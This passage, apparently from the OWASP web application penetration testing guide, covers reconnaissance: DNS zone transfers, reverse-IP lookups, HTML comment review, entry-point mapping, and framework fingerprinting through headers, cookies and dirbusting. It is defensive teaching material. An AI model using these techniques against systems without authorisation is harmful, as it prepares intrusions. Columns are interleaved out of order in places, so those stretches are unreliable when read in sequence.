The same task may be performed by vulnerability scanners, but first check that the scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided it is instructed to scan all the ports), and will provide, with respect to nmap, a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications or web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface). Approaches to address issue 3 - virtual hosts There are a number of techniques which may be used to identify DNS names associated to a given IP address x.y.z.t. DNS zone transfers This technique has limited use nowadays, given the fact that zone transfers are largely not honored by DNS servers. However, it may be worth a try. First of all, testers must determine the name servers serving x.y.z.t. If a symbolic name is known for x.y.z.t (let it be www. example.com), its name servers can be determined by means of tools such as nslookup, host, or dig, by requesting DNS NS records. If no symbolic names are known for x.y.z.t, but the target definition contains at least a symbolic name, testers may try to apply the same process and query the name server of that name (hoping that x.y.z.t will be served as well by that name server). For example, if the target consists of the IP address x.y.z.t and the name mail.example.com, determine the name servers for domain example.com. The following example shows how to identify the name servers for www.owasp.org by using the host command: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. A zone transfer may now be requested to the name servers for domain example.com. If the tester is lucky, they will get back a list of the DNS entries for this domain. This will include the obvious www.example.com and the not-so-obvious helpdesk.example.com and webmail. example.com (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated. Trying to request a zone transfer for owasp.org from one of its name servers: $ host -l www.owasp.org ns1.secure.net Using domain server: Name: ns1.secure.net Address: 192.220.124.10#53 Aliases: Host www.owasp.org not found: 5(REFUSED) ; Transfer failed. DNS inverse queries This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If the testers are lucky, they may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic name maps, which is not guaranteed. Web-based DNS searches This kind of search is akin to DNS zone transfer, but relies on webbased services that enable name-based searches on DNS. One such service is the Netcraft Search DNS service, available at http:// searchdns.netcraft.com/?host. The tester may query for a list of names belonging to your domain of choice, such as example.com. Then they will check whether the names they obtained are pertinent to the target they are examining. 
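The DNS inverse (PTR) query technique described above can be scripted as a quick first pass before turning to web-based services. The sketch below performs reverse lookups with the Python standard library; the addresses are placeholders, and the absence of a PTR record simply means no name is returned.

import socket

targets = ["192.168.1.100", "192.168.1.101"]    # placeholder in-scope addresses

for ip in targets:
    try:
        name, aliases, _ = socket.gethostbyaddr(ip)
        # A PTR record exists: the returned names may reveal additional virtual hosts.
        print(ip, "->", name, aliases if aliases else "")
    except socket.herror:
        print(ip, "-> no PTR record (IP-to-name mapping is not guaranteed)")

Names obtained this way still need to be checked for relevance to the target, exactly as with zone transfers and web-based DNS searches.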
37 Web Application Penetration Testing Reverse-IP services Reverse-IP services are similar to DNS inverse queries, with the difference that the testers query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis. Gray Box Testing Not applicable. The methodology remains the same as listed in Black Box testing no matter how much information the tester starts with. Tools MSN search: http://search.msn.com syntax: “ip:x.x.x.x” (without the quotes) • DNS lookup tools such as nslookup, dig and similar. • Search engines (Google, Bing and other major search engines). • Specialized DNS-related web-based search service: see text. • Nmap - http://www.insecure.org • Nessus Vulnerability Scanner - http://www.nessus.org • Nikto - http://www.cirt.net/nikto2 Webhosting info: http://whois.webhosting.info/ syntax: http:// whois.webhosting.info/x.x.x.x References Whitepapers [1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 DNSstuff: http://www.dnsstuff.com/ (multiple services available) Review webpage comments and metadata for information leakage (OTG-INFO-005) Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (requires free membership) http://www.net-square.com/mspawn.html (multiple queries on domains and IP addresses, requires installation) tomDNS: http://www.tomdns.net/index.php (some services are still private at the time of writing) SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse-IP/domain lookup) The following example shows the result of a query to one of the above reverse-IP services to 216.48.3.18, the IP address of www.owasp.org. Three additional non-obvious symbolic names mapping to the same address have been revealed. Summary It is very common, and even recommended, for programmers to include detailed comments and metadata on their source code. However, comments and metadata included into the HTML code might reveal internal information that should not be available to potential attackers. Comments and metadata review should be done in order to determine if any information is being leaked. Test Objectives Review webpage comments and metadata to better understand the application and to find any information leakage. How to Test HTML comments are often used by the developers to include debugging information about the application. Sometimes they forget about the comments and they leave them on in production. Testers should look for HTML comments which start with “”. Black Box Testing Check HTML source code for comments containing sensitive information that can help the attacker gain more insight about the application. It might be SQL code, usernames and passwords, internal IP addresses, or debugging information. ... Googling Following information gathering from the previous techniques, testers can rely on search engines to possibly refine and increment their analysis. This may yield evidence of additional symbolic names belonging to the target, or applications accessible via non-obvious URLs. For instance, considering the previous example regarding www. owasp.org, the tester could query Google and other search engines looking for information (hence, DNS names) related to the newly discovered domains of webgoat.org, webscarab.com, and webscarab. net. Googling techniques are explained in Testing: Spiders, Robots, and Crawlers.... 
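Reviewing comments by hand scales poorly on large applications, so part of the check described above can be automated. The sketch below downloads a single page and prints every HTML comment, flagging those that contain a few keywords often associated with sensitive leftovers; the URL and the keyword list are assumptions for illustration only, and every hit still needs manual review.

import re
import urllib.request

URL = "http://www.example.com/"                      # example page
KEYWORDS = ("password", "user", "sql", "select", "todo", "fixme", "debug")

with urllib.request.urlopen(URL, timeout=10) as resp:
    html = resp.read().decode(errors="ignore")

# Extract <!-- ... --> comments, including multi-line ones.
for comment in re.findall(r"<!--(.*?)-->", html, re.DOTALL):
    text = comment.strip()
    flagged = any(word in text.lower() for word in KEYWORDS)
    print(("[REVIEW] " if flagged else "") + text)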
The tester may even find leftover credentials or whole blocks of commented-out code in this way.

Check HTML version information for valid version numbers and Data Type Definition (DTD) URLs, for example:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

• "strict.dtd" -- default strict DTD
• "loose.dtd" -- loose DTD
• "frameset.dtd" -- DTD for frameset documents

Some Meta tags do not provide active attack vectors but instead allow an attacker to profile an application. Other Meta tags alter HTTP response headers, such as http-equiv, which sets an HTTP response header based on the content attribute of a meta element. For example, <META http-equiv="Expires" content="Fri, 21 Dec 2012 12:34:56 GMT"> will result in the HTTP header Expires: Fri, 21 Dec 2012 12:34:56 GMT, and <META http-equiv="Cache-Control" content="no-cache"> will result in Cache-Control: no-cache. Test to see if this can be used to conduct injection attacks (e.g. a CRLF attack). It can also help determine the level of data leakage via the browser cache. A common (but not WCAG compliant) Meta tag is the refresh.

A common use for Meta tags is to specify keywords that a search engine may use to improve the quality of search results. Although most web servers manage search engine indexing via the robots.txt file, it can also be managed by Meta tags: a tag such as <META name="robots" content="noindex,nofollow"> will advise robots to not index and not follow links on the HTML page containing the tag. The Platform for Internet Content Selection (PICS) and Protocol for Web Description Resources (POWDER) provide infrastructure for associating meta data with Internet content.

Gray Box Testing
Not applicable.

Tools
• Wget
• Browser "view source" function
• Eyeballs
• Curl

References
Whitepapers
[1] http://www.w3.org/TR/1999/REC-html401-19991224 HTML version 4.01
[2] http://www.w3.org/TR/2010/REC-xhtml-basic-20101123/ XHTML (for small devices)
[3] http://www.w3.org/TR/html5/ HTML version 5

Identify application entry points (OTG-INFO-006)

Summary
Enumerating the application and its attack surface is a key precursor before any thorough testing can be undertaken, as it allows the tester to identify likely areas of weakness. This section aims to help identify and map out areas within the application that should be investigated once enumeration and mapping have been completed.

Test Objectives
Understand how requests are formed and the typical responses from the application.

How to Test
Before any testing begins, the tester should always get a good understanding of the application and of how the user and browser communicate with it. As the tester walks through the application, they should pay special attention to all HTTP requests (GET and POST methods, also known as verbs), as well as to every parameter and form field that is passed to the application. In addition, they should pay attention to when GET requests are used and when POST requests are used to pass parameters to the application. It is very common that GET requests are used, but when sensitive information is passed, it is often done within the body of a POST request.

Note that to see the parameters sent in a POST request, the tester will need to use a tool such as an intercepting proxy (for example, OWASP Zed Attack Proxy (ZAP)) or a browser plug-in. Within the POST request, the tester should also make special note of any hidden form fields that are being passed to the application, as these usually contain sensitive information, such as state information, quantity of items, or the price of items, that the developer never intended for anyone to see or change.

In the author's experience, it has been very useful to use an intercepting proxy and a spreadsheet for this stage of the testing.
The proxy will keep track of every request and response between the tester and the application as they u walk through it. Additionally, at this point, testers usually trap every request and response so that they can see exactly every header, parameter, etc. that is being passed to the application and what is being returned. This can be quite tedious at times, especially on large interactive sites (think of a banking application). However, experience will show what to look for and this phase can be significantly reduced. As the tester walks through the application, they should take note of any interesting parameters in the URL, custom headers, or body of the requests/responses, and save them in a spreadsheet. The spreadsheet should include the page requested (it might be good to also add the request number from the proxy, for future reference), the interesting parameters, the type of request (POST/GET), if access is authenticated/unauthenticated, if SSL is used, if it’s part of a multi-step process, and any other relevant notes. Once they have every area of the application mapped out, then they can go through the application and test each of the areas that they have identified and make notes for what worked and what didn’t work. The rest of this guide will identify how to test each of these areas of interest, but this section must be undertaken before any of the actual testing can commence. Below are some points of interests for all requests and responses. Within the requests section, focus on the GET and POST methods, as these appear the majority of the requests. Note that other methods, such as PUT and DELETE, can be used. Often, these more rare requests, if allowed, can expose vulnerabilities. There is a special section in this guide dedicated for testing these HTTP methods. Requests: • Identify where GETs are used and where POSTs are used. • Identify all parameters used in a POST request (these are in the body of the request). • Within the POST request, pay special attention to any hidden parameters. When a POST is sent all the form fields (including hidden parameters) will be sent in the body of the HTTP message to the application. These typically aren’t seen unless a proxy or view the HTML source code is used. In addition, the next page shown, its data, and the level of access can all be different depending on the value of the hidden parameter(s). • Identify all parameters used in a GET request (i.e., URL), in particular the query string (usually after a ? mark). • Identify all the parameters of the query string. These usually are in a pair format, such as foo=bar. Also note that many parameters can be in one query string such as separated by a &, ~, :, or any other special character or encoding. • A special note when it comes to identifying multiple parameters in one string or within a POST request is that some or all of the parameters will be needed to execute the attacks. The tester needs to identify all of the parameters (even if encoded or encrypted) and identify which ones are processed by the application. Later sections of the guide will identify how to test these parameters. At this point, just make sure each one of them is identified. • Also pay attention to any additional or custom type headers not typically seen (such as debug=False). Responses: • Identify where new cookies are set (Set-Cookie header), modified, or added to. 
• Identify where there are any redirects (3xx HTTP status code), 400 status codes, in particular 403 Forbidden, and 500 internal server errors during normal responses (i.e., unmodified requests). • Also note where any interesting headers are used. For example, “Server: BIG-IP” indicates that the site is load balanced. Thus, if a site is load balanced and one server is incorrectly configured, then the tester might have to make multiple requests to access the vulnerable server, depending on the type of load balancing used. Black Box Testing Testing for application entry points: The following are two examples on how to check for application entry points. EXAMPLE 1 This example shows a GET request that would purchase an item from an online shopping application. GET https://x.x.x.x/shoppingApp/buyme.asp?CUSTOMERID=100&ITEM=z101a&PRICE=62.50&IP=x.x.x.x Host: x.x.x.x Cookie: SESSIONID=Z29vZCBqb2IgcGFkYXdhIG15IHVzZXJuYW1lIGlzIGZvbyBhbmQgcGFzc3dvcmQgaXMgYmFy Result Expected: Here the tester would note all the parameters of the request such as CUSTOMERID, ITEM, PRICE, IP, and the Cookie (which could just be encoded parameters or used for session state). EXAMPLE 2 This example shows a POST request that would log you into an application. POST https://x.x.x.x/KevinNotSoGoodApp/authenticate.asp?service=login Host: x.x.x.x Cookie: SESSIONID=dGhpcyBpcyBhIGJhZCBhcHAgdGhhdCBzZXRzIHByZWRpY3RhYmxlIGNvb2tpZXMgYW5kIG1pbmUgaXMgMTIzNA== CustomCookie=00my00trusted00ip00is00x.x.x.x00 Body of the POST message: user=admin&pass=pass123&debug=true&fromtrustIP=true Result Expected: In this example the tester would note all the parameters as they have before but notice that the parameters are passed in the body of the message and not in the URL. Additionally, note that there is a custom cookie that is being used. 40 Web Application Penetration Testing Gray Box Testing Testing for application entry points via a Gray Box methodology would consist of everything already identified above with one addition. In cases where there are external sources from which the application receives data and processes it (such as SNMP traps, syslog messages, SMTP, or SOAP messages from other servers) a meeting with the application developers could identify any functions that would accept or expect user input and how they are formatted. For example, the developer could help in understanding how to formulate a correct SOAP request that the application would accept and where the web service resides (if the web service or any other function hasn’t already been identified during the black box testing). Tools Intercepting Proxy: • OWASP: Zed Attack Proxy (ZAP) • OWASP: WebScarab • Burp Suite • CAT Browser Plug-in: • TamperIE for Internet Explorer • Tamper Data for Firefox References Whitepapers • RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 http://tools.ietf.org/html/rfc2616 flow, transformation and use of data throughout an application. • Race - tests multiple concurrent instances of the application manipulating the same data. The trade off as to what method is used and to what degree each method is used should be negotiated with the application owner. Simpler approaches could also be adopted, including asking the application owner what functions or code sections they are particularly concerned about and how those code segments can be reached. 
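As a minimal sketch of the documentation approach described in the Black Box Testing paragraph that follows (wget is assumed to be available and www.example.com is a placeholder), the links discovered while spidering can be dumped into a flat list that seeds the coverage spreadsheet:

$ wget --spider -r -l 2 http://www.example.com 2>&1 | grep '^--' | awk '{ print $3 }' | sort -u > discovered-urls.txt   # crawl two levels deep without saving pages and keep the unique URLs

Each URL in the resulting file can then be annotated with the decision points, parameters and access level it exposes.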
Black Box Testing To demonstrate code coverage to the application owner, the tester can start with a spreadsheet and document all the links discovered by spidering the application (either manually or automatically). Then the tester can look more closely at decision points in the application and investigate how many significant code paths are discovered. These should then be documented in the spreadsheet with URLs, prose and screenshot descriptions of the paths discovered. Gray/White Box testing Ensuring sufficient code coverage for the application owner is far easier with the gray and white box approach to testing. Information solicited by and provided to the tester will ensure the minimum requirements for code coverage are met. Example Automatic Spidering The automatic spider is a tool used to automatically discover new resources (URLs) on a particular website. It begins with a list of URLs to visit, called the seeds, which depends on how the Spider is started. While there are a lot of Spidering tools, the following example uses the Zed Attack Proxy (ZAP): Map execution paths through application (OTG-INFO-007) Summary Before commencing security testing, understanding the structure of the application is paramount. Without a thorough understanding of the layout of the application, it is unlkely that it will be tested thoroughly. Test Objectives Map the target application and understand the principal workflows. How to Test In black box testing it is extremely difficult to test the entire code base. Not just because the tester has no view of the code paths through the application, but even if they did, to test all code paths would be very time consuming. One way to reconcile this is to document what code paths were discovered and tested. There are several ways to approach the testing and measurement of code coverage: • Path - test each of the paths through an application that includes combinatorial and boundary value analysis testing for each decision path. While this approach offers thoroughness, the number of testable paths grows exponentially with each decision branch. • Data flow (or taint analysis) - tests the assignment of variables via external interaction (normally users). Focuses on mapping the ZAP offers the following automatic spidering features, which can be selected based on the tester’s needs: • Spider Site - The seed list contains all the existing URIs already found for the selected site. • Spider Subtree - The seed list contains all the existing URIs already found and present in the subtree of the selected node. • Spider URL - The seed list contains only the URI corresponding to the selected node (in the Site Tree). • Spider all in Scope - The seed list contains all the URIs the user has selected as being ‘In Scope’. Tools • Zed Attack Proxy (ZAP) 41 Web Application Penetration Testing • List of spreadsheet software • Diagramming software References Whitepapers [1] http://en.wikipedia.org/wiki/Code_coverage Fingerprint Web Application Framework (OTG-INFO-008) Summary Web framework[*] fingerprinting is an important subtask of the information gathering process. Knowing the type of framework can automatically give a great advantage if such a framework has already been tested by the penetration tester. It is not only the known vulnerabilities in unpatched versions but specific misconfigurations in the framework and known file structure that makes the fingerprinting process so important. Several different vendors and versions of web frameworks are widely used. 
Information about it significantly helps in the testing process, and can also help in changing the course of the test. Such information can be derived by careful analysis of certain common locations. Most of the web frameworks have several markers in those locations which help an attacker to spot them. This is basically what all automatic tools do, they look for a marker from a predefined location and then compare it to the database of known signatures. For better accuracy several markers are usually used. [*] Please note that this article makes no differentiation between Web Application Frameworks (WAF) and Content Management Systems (CMS). This has been done to make it convenient to fingerprint both of them in one chapter. Furthermore, both categories are referenced as web frameworks. Test Objectives To define type of used web framework so as to have a better understanding of the security testing methodology. How to Test Black Box testing There are several most common locations to look in in order to define the current framework: • HTTP headers • Cookies • HTML source code • Specific files and folders HTTP headers The most basic form of identifying a web framework is to look at the X-Powered-By field in the HTTP response header. Many tools can be used to fingerprint a target. The simplest one is netcat utility. Consider the following HTTP Request-Response: $ nc 127.0.0.1 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: nginx/1.0.14 Date: Sat, 07 Sep 2013 08:19:15 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Vary: Accept-Encoding X-Powered-By: Mono From the X-Powered-By field, we understand that the web application framework is likely to be Mono. However, although this approach is simple and quick, this methodology doesn’t work in 100% of cases. It is possible to easily disable X-Powered-By header by a proper configuration. There are also several techniques that allow a web site to obfuscate HTTP headers (see an example in #Remediation chapter). So in the same example the tester could either miss the X-Powered-By header or obtain an answer like the following: HTTP/1.1 200 OK Server: nginx/1.0.14 Date: Sat, 07 Sep 2013 08:19:15 GMT Content-Type: text/html;charset=ISO-8859-1 Connection: close Vary: Accept-Encoding X-Powered-By: Blood, sweat and tears Sometimes there are more HTTP-headers that point at a certain web framework. In the following example, according to the information from HTTP-request, one can see that X-Powered-By header contains PHP version. However, the X-Generator header points out the used framework is actually Swiftlet, which helps a penetration tester to expand his attack vectors. When performing fingerprinting, always carefully inspect every HTTP-header for such leaks. HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Sat, 07 Sep 2013 09:22:52 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.4.16-1~dotdeb.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, postcheck=0, pre-check=0 Pragma: no-cache X-Generator: Swiftlet 42 Web Application Penetration Testing Cookies Another similar and somehow more reliable way to determine the current web framework are framework-specific cookies. Consider the following HTTP-request: GET /cake HTTP /1.1 Host: defcon-moscow.org User-Agent: Mozilla75.0 |Macintosh; Intel Mac OS X 10.7; rv: 22. 0) Gecko/20100101 Firefox/22 . 
0 Accept: text/html, application/xhtml + xml, application/xml; q=0.9, */*; q=0 , 8 Accept - Language: ru-ru, ru; q=0.8, en-us; q=0.5 , en; q=0 . 3 Accept - Encoding: gzip, deflate DNT: 1 Cookie: CAKEPHP=rm72kprivgmau5fmjdesbuqi71; Connection: Keep-alive Cache-Control: max-age=0 The cookie CAKEPHP has automatically been set, which gives information about the framework being used. List of common cookies names is presented in chapter #Cookies_2. Limitations are the same - it is possible to change the name of the cookie. For example, for the selected CakePHP framework this could be done by the following configuration (excerpt from core.php): /** * The name of CakePHP’s session cookie. * * Note the guidelines for Session names states: “The session name references * the session id in cookies and URLs. It should contain only alphanumeric * characters.” * @link http://php.net/session_name */ Configure::write(‘Session.cookie’, ‘CAKEPHP’); However, these changes are less likely to be made than changes to the X-Powered-By header, so this approach can be considered as more reliable. HTML source code This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web framework. One of the common markers are HTML comments that directly lead to framework disclosure. More often certain framework-specific paths can be found, i.e. links to framework-specific css and/or js folders. Finally, specific script variables might also point to a certain framework. From the screenshot below one can easily learn the used framework and its version by the mentioned markers. The comment, specific paths and script variables can all help an attacker to quickly determine an instance of ZK framework. More frequently such information is placed between head> tags, in tags or at the end of the page. Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields. Sometimes, web developers do not care much about hiding information about the framework used. It is still possible to stumble upon something like this at the bottom of the page: Common frameworks Cookies Framework Cookie name Zope BITRIX_ CakePHP AMP Laravel django HTML source code General Markers %framework_name% powered by built upon running Specific markers Framework Keyword Adobe ColdFusion Indexhibit ndxz-studio Specific files and folders Specific files and folders are different for each specific framework. It is recommended to install the corresponding framework during penetration tests in order to have better understanding of what infrastructure is presented and what files might be left on the server. However, several good file lists already exist and one good example is FuzzDB wordlists of predictable files/folders (http://code.google.com/p/fuzzdb/). Tools A list of general and well-known tools is presented below. There are also a lot of other utilities, as well as framework-based fingerprinting tools. WhatWeb Website: http://www.morningstarsecurity.com/research/whatweb Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build. 
Language: Ruby Matches for fingerprinting are made with: • Text strings (case sensitive) • Regular expressions • Google Hack Database queries (limited set of keywords) • MD5 hashes • URL recognition • HTML tag patterns 43 Web Application Penetration Testing • Custom ruby code for passive and aggressive operations Wappalyzer Website: http://wappalyzer.com Wapplyzer is a Firefox Chrome plug-in. It works only on regular expression matching and doesn’t need anything other than the page to be loaded on browser. It works completely at the browser level and gives results in the form of icons. Although sometimes it has false positives, this is very handy to have notion of what technologies were used to construct a target website immediately after browsing a page. Sample output of a plug-in is presented on a screenshot below. Sample output is presented on a screenshot below: BlindElephant Website: https://community.qualys.com/community/blindelephant This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python Sample output of a successful fingerprint: pentester$ python BlindElephant.py http://my_target drupal Loaded /Library/Python/2.7/site-packages/blindelephant/ dbs/drupal.pkl with 145 versions, 478 differentiating paths, and 434 version groups. Starting BlindElephant fingerprint for version of drupal at http://my_target Hit http://my_target/CHANGELOG.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 527b085a3717bd691d47713dff74acf4 Hit http://my_target/INSTALL.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 14dfc133e4101be6f0ef5c64566da4a4 Hit http://my_target/misc/drupal.js Possible versions based on result: 7.12, 7.13, 7.14 References Whitepapers • Saumil Shah: “An Introduction to HTTP fingerprinting” - http:// www.net-square.com/httprint_paper.html • Anant Shrivastava : “Web Application Finger Printing” - http:// anantshri.info/articles/web_app_finger_printing.html Remediation The general advice is to use several of the tools described above and check logs to better understand what exactly helps an attacker to disclose the web framework. By performing multiple scans after changes have been made to hide framework tracks, it’s possible to achieve a better level of security and to make sure of the framework can not be detected by automatic scans. Below are some specific recommendations by framework marker location and some additional interesting approaches. Hit http://my_target/MAINTAINERS.txt File produced no match. Error: Retrieved file doesn’t match known fingerprint. 36b740941a19912f3fdbfcca7caa08ca HTTP headers Check the configuration and disable or obfuscate all HTTP-headers that disclose information the technologies used. Here is an interesting article about HTTP-headers obfuscation using Netscaler: http://grahamhosking.blogspot.ru/2013/07/obfuscating-http-header-using-netscaler.html Hit http://my_target/themes/garland/style.css Possible versions based on result: 7.2, 7.3, 7.4, 7.5, 7.6, 7.7, 7.8, 7.9, 7.10, 7.11, 7.12, 7.13, 7.14 ... Cookies It is recommended to change cookie names by making changes in the corresponding configuration files. Fingerprinting resulted in: 7.14 HTML source code Manually check the contents of the HTML code and remove everything that explicitly points to the framework. 
Best Guess: 7.14 General guidelines: • Make sure there are no visual markers disclosing the framework 44 Web Application Penetration Testing • Remove any unnecessary comments (copyrights, bug information, specific framework comments) • Remove META and generator tags • Use the companies own css or js files and do not store those in a framework-specific folders • Do not use default scripts on the page or obfuscate them if they must be used. that is entirely or partly dependent on these well known applications (e.g. Wordpress, phpBB, Mediawiki, etc). Knowing the web application components that are being tested significantly helps in the testing process and will also drastically reduce the effort required during the test. These well known web applications have known HTML headers, cookies, and directory structures that can be enumerated to identify the application. Specific files and folders General guidelines: Test Objectives Identify the web application and version to determine known vulnerabilities and the appropriate exploits to use during testing. • Remove any unnecessary or unused files on the server. This implies text files disclosing information about versions and installation too. • Restrict access to other files in order to achieve 404-response when accessing them from outside. This can be done, for example, by modifying htaccess file and adding RewriteCond or RewriteRule there. An example of such restriction for two common WordPress folders is presented below. RewriteCond %{REQUEST_URI} /wp-login\.php$ [OR] RewriteCond %{REQUEST_URI} /wp-admin/$ RewriteRule $ /http://your_website [R=404,L] However, these are not the only ways to restrict access. In order to automate this process, certain framework-specific plugins exist. One example for WordPress is StealthLogin (http://wordpress.org/ plugins/stealth-login-page). Additional approaches General guidelines: [1] Checksum management The purpose of this approach is to beat checksum-based scanners and not let them disclose files by their hashes. Generally, there are two approaches in checksum management: • Change the location of where those files are placed (i.e. move them to another folder, or rename the existing folder) • Modify the contents - even slight modification results in a completely different hash sum, so adding a single byte in the end of the file should not be a big problem. [2] Controlled chaos A funny and effective method that involves adding bogus files and folders from other frameworks in order to fool scanners and confuse an attacker. But be careful not to overwrite existing files and folders and to break the current framework! Fingerprint Web Application (OTG-INFO-009) Summary There is nothing new under the sun, and nearly every web application that one may think of developing has already been developed. With the vast number of free and open source software projects that are actively developed and deployed around the world, it is very likely that an application security test will face a target site How to Test Cookies A relatively reliable way to identify a web application is by the application-specific cookies. 
Consider the following HTTP request:

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: wp-settings-time-1=1406093286; wp-settings-time-2=1405988284
DNT: 1
Connection: keep-alive
Host: blog.owasp.org

The wp-settings-time cookies have automatically been set, which gives information about the application being used (WordPress in this case). A list of common cookie names is presented in the Common Application Identifiers section below. However, it is possible to change the name of the cookie.

HTML source code
This technique is based on finding certain patterns in the HTML page source code. Often one can find a lot of information which helps a tester to recognize a specific web application. One of the common markers are HTML comments that directly lead to application disclosure. More often certain application-specific paths can be found, i.e. links to application-specific css and/or js folders. Finally, specific script variables might also point to a certain application. From a generator meta tag such as the one emitted by WordPress (<meta name="generator" content="WordPress" /> followed by the version number), one can easily learn the application used by a website and its version. The comment, specific paths and script variables can all help an attacker to quickly determine an instance of an application. More frequently such information is placed between the <head> tags, in <meta> or <script> tags, or at the end of the page. Nevertheless, it is recommended to check the whole document since it can be useful for other purposes such as inspection of other useful comments and hidden fields.

Specific files and folders
Apart from information gathered from HTML sources, there is another approach which greatly helps an attacker to determine the application with high accuracy. Every application has its own specific file and folder structure on the server. It has been pointed out that one can see specific paths in the HTML page source, but sometimes they are not explicitly presented there and still reside on the server. Specific files and folders are different for each specific application. It is recommended to install the corresponding application during penetration tests in order to have a better understanding of what infrastructure is presented and what files might be left on the server. However, several good file lists already exist and one good example is FuzzDB wordlists of predictable files/folders (http://code.google.com/p/fuzzdb/).

In order to uncover them a technique known as dirbusting is used. Dirbusting is brute forcing a target with predictable folder and file names and monitoring HTTP responses to enumerate server contents. This information can be used both for finding default files and attacking them, and for fingerprinting the web application. Dirbusting can be done in several ways; the example below shows a successful dirbusting attack against a WordPress-powered target with the help of a defined list and the Intruder functionality of Burp Suite (a simple scripted alternative is sketched after the identifier tables below). We can see that for some WordPress-specific folders (for instance, /wp-includes/, /wp-admin/ and /wp-content/) the HTTP responses are 403 (Forbidden), 302 (Found, redirection to wp-login.php) and 200 (OK) respectively. This is a good indicator that the target is WordPress-powered. In the same way it is possible to dirbust different application plugin folders and their versions. On the screenshot below one can see a typical CHANGELOG file of a Drupal plugin, which provides information on the application being used and discloses a vulnerable plugin version.

Common Application Identifiers
Cookies
Application - Cookie name
phpBB - phpbb3_
WordPress - wp-settings
1C-Bitrix - BITRIX_
AMPcms - AMP
Django CMS - django
DotNetNuke - DotNetNukeAnonymous
e107 - e107
EPiServer - EPiTrace, EPiServer
Graffiti CMS - graffitibot
Hotaru CMS - hotaru_mobile
ImpressCMS - ICMSession
Indico - MAKACSESSION
InstantCMS - InstantCMS[logdate]
Kentico CMS - CMSPreferredCulture
MODx - SN4[12symb]
TYPO3 - fe_typo_user
Dynamicweb - Dynamicweb
LEPTON - lep[some_numeric_value]+sessionid
Wix - Domain=.wix.com
VIVVO - VivvoSessionId

HTML source code
Typical page source markers include the WordPress generator meta tag described above and phpBB-specific identifiers in the page body.
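The following loop is an illustrative alternative to the Burp Intruder run mentioned above (curl is assumed, www.example.com is a placeholder, and the path list is a small stand-in for a proper FuzzDB-style wordlist); it simply prints the HTTP status code returned for a few application-specific paths:

$ for path in wp-admin/ wp-includes/ wp-content/ CHANGELOG.txt ; do printf '%-16s ' "$path" ; curl -s -o /dev/null -w '%{http_code}\n' "http://www.example.com/$path" ; done   # one status code per candidate path

A 403/302/200 pattern across the WordPress-specific folders, as discussed above, is exactly the kind of response fingerprint that identifies the application.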
Map Application Architecture (OTG-INFO-010)

[...]

Reverse proxies and application-layer firewalls placed in front of a web server can often be recognized by the error pages they return, for example:

Error
FW-1 at XXXXXX: Access denied. Example of the security server of Check Point Firewall-1 NG AI “protecting” a web server Reverse proxies can also be introduced as proxy-caches to accelerate the performance of back-end application servers. Detecting these proxies can be done based on the server header. They can also be detected by timing requests that should be cached by the server and comparing the time taken to server the first request with subsequent requests. Another element that can be detected is network load balancers. Typically, these systems will balance a given TCP/IP port to multiple servers based on different algorithms (round-robin, web server load, number of requests, etc.). Thus, the detection of this architecture element needs to be done by examining multiple requests and comparing results to determine if the requests are going to the same or different web servers. For example, based on the Date header if the server clocks are not synchronized. In some cases, the network load balance process might inject new information in the headers that will make it stand out distinctively, like the AlteonP cookie introduced by Nortel’s Alteon WebSystems load balancer. Application web servers are usually easy to detect. The request for several resources is handled by the application server itself (not the web server) and the response header will vary significantly (including different or additional values in the answer header). Another way to detect these is to see if the web server tries to set cookies which are indicative of an application web server being used (such as the JSESSIONID provided by some J2EE servers), or to rewrite URLs automatically to do session tracking. Authentication back ends (such as LDAP directories, relational databases, or RADIUS servers) however, are not as easy to detect from an external point of view in an immediate way, since they will be hidden by the application itself. The use of a back end database can be determined simply by navigating an application. If there is highly dynamic content generated “on the fly,” it is probably being extracted from some sort of database by the application itself. Sometimes the way information is requested might give insight to the existence of a database back-end. For example, an online shopping application that uses numeric identifiers (‘id’) when browsing the different articles in the shop. However, when doing a blind application test, knowledge of the underlying database is usually only available when a vulnerability surfaces in the application, such as poor exception handling or susceptibility to SQL injection. References [1] WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework. [2] There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. Testing for configuration management Understanding the deployed configuration of the server hosting the web application is almost as important as the application security testing itself. After all, an application chain is only as strong as its weakest link. Application platforms are wide and varied, but some key platform configuration errors can compromise the application in the same way an unsecured application can compromise the server. 
